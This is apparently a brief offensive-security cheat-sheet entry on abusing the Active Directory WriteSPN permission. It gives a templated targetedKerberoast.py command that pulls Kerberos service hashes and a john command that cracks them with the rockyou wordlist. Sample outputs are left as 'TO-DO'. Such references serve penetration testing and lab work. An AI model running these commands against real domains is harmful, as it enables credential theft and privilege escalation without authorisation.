TLDRBins TLDRBins / WriteSPN


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Privesc #1: Targeted Kerberoast

1. Targeted Kerberoast

# Password python3 targetedKerberoast.py -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --dc-ip '<DC_IP>'
Sample Output: TO-DO

2. Hash Crack

john --wordlist=/usr/share/wordlists/rockyou.txt <HASH_FILE>
Sample Output: TO-DO

Ref: targetedKerberoast